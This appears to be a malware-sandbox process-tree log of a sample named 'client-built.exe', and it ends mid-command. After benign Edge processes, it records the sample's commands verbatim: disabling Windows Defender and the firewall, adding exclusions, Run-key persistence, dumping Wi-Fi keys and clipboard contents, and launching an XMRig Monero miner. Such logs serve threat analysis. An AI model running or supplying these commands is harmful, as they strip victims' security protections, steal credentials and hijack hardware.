"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --mojo-platform-channel-handle=6256 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:8
1⤵
PID:2148

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x508 0x33c
1⤵
PID:1008

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --mojo-platform-channel-handle=5756 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:1768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --mojo-platform-channel-handle=3724 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:3152

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --mojo-platform-channel-handle=5756 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:1428

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --mojo-platform-channel-handle=4780 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:1176

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --mojo-platform-channel-handle=5640 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:2380

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --mojo-platform-channel-handle=6676 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:3968

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --mojo-platform-channel-handle=6900 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:2300

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --mojo-platform-channel-handle=7160 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:8
1⤵
PID:4944

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --mojo-platform-channel-handle=7268 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:2944

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --mojo-platform-channel-handle=7680 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:8
1⤵
PID:408

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --mojo-platform-channel-handle=7844 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:5056

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --mojo-platform-channel-handle=8004 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:1324

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --mojo-platform-channel-handle=8132 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:500

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --mojo-platform-channel-handle=8264 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:708

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --mojo-platform-channel-handle=8392 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:4340

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --mojo-platform-channel-handle=8664 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:5348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --mojo-platform-channel-handle=8796 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:5356

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --mojo-platform-channel-handle=8816 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:5364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --mojo-platform-channel-handle=8932 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:5372

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --mojo-platform-channel-handle=9048 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:5380

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --mojo-platform-channel-handle=9164 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:5388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --mojo-platform-channel-handle=9284 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:5396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --mojo-platform-channel-handle=9524 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:5408

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --mojo-platform-channel-handle=9632 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:5416

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --mojo-platform-channel-handle=9676 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:5424

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --mojo-platform-channel-handle=9964 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:5432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --mojo-platform-channel-handle=10088 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:5440

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --mojo-platform-channel-handle=10244 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:5536

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --mojo-platform-channel-handle=10468 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:6216

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --mojo-platform-channel-handle=10892 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:6228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --mojo-platform-channel-handle=10024 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:6256

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=7160 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:8
1⤵
PID:5712

C:\Users\Admin\Downloads\client-built.exe
"C:\Users\Admin\Downloads\client-built.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:6192
- C:\Users\Admin\Downloads\client-built.exe
  "C:\Users\Admin\Downloads\client-built.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:5792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\client-built.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:7072
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\client-built.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:6164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:6972
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:6080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5420
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:7344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:6076
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      PID:4444
    - - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Loads dropped DLL
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1328
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:3128
      - C:\Windows\System32\Wbem\wmic.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:624
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get MUILanguages /format:list"
        6⤵
        
        PID:6344
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get MUILanguages /format:list
        7⤵
        
        PID:5788
      - C:\Windows\System32\Wbem\wmic.exe
        
        wmic os get MUILanguages /format:list
        6⤵
        
        PID:6200
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption /format:list"
        6⤵
        
        PID:7396
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption /format:list
        7⤵
        
        PID:7252
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"
        6⤵
        
        PID:6384
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path softwarelicensingservice get OA3xOriginalProductKey
        7⤵
        
        PID:4220
      - C:\Windows\System32\Wbem\wmic.exe
        
        wmic csproduct get name
        6⤵
        
        PID:2468
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh advfirewall set domainprofile state off"
        6⤵
        
        PID:7344
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:6200
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        7⤵
        Modifies Windows Firewall
        
        PID:4536
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableRealtimeMonitoring" -Value 1"
        6⤵
        
        PID:6432
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\rose','C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'""
        6⤵
        
        PID:7584
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\rose','C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3364
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true""
        6⤵
        
        PID:4000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6624
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        6⤵
        
        PID:5944
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        7⤵
        
        PID:2408
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
        6⤵
        
        PID:4060
        
        C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        7⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:3428
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
        6⤵
        
        PID:2652
        
        C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        7⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:2116
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v rose /f"
        6⤵
        
        PID:3560
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v rose /f
        7⤵
        
        PID:5328
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v rose /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\rose\rose.exe" /f"
        6⤵
        
        PID:6572
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v rose /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\rose\rose.exe" /f
        7⤵
        Adds Run key to start application
        
        PID:8056
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:2084
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        6⤵
        
        PID:7864
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:7048
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        7⤵
        
        PID:6804
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile name="The Wireless AutoConfig Service (wlansvc) is not running." key=clear"
        6⤵
        
        PID:8036
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile name="The Wireless AutoConfig Service (wlansvc) is not running." key=clear
        7⤵
        
        PID:7716
      - C:\Users\Admin\AppData\Roaming\rose\xmrig\xmrig-6.21.0\xmrig.exe
        
        C:\Users\Admin\AppData\Roaming\rose\xmrig\xmrig-6.21.0\xmrig.exe --donate-level 1 -o de.monero.herominers.com:1111 -u 8ARMNNYwDRKNY5Cs1db7z6CTCFzTiCUzdKt9UZc1iiTKfRu4GQXAU5e2oV5eqUDcZmPGgPTqbenNp617kMrBCh1ELdHgjZG -p 265522932335 -a rx/0 -k --background
        6⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:7664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('An error has occured while installing py modules, make sure Python 3.11 is installed and added to PATH.', 0, 'Python Error', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2568
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('An error has occured while installing py modules, make sure Python 3.11 is installed and added to PATH.', 0, 'Python Error', 0+16);close()"
      4⤵
      PID:7356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍‌ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:6348
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍‌ .scr'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:7512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5920
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:7208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1424
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:7216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:6628
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5668
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:7608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4944
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:7840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:6700
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:7832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    PID:5052
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      PID:7856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:6196
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:7848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:2888
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:8176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 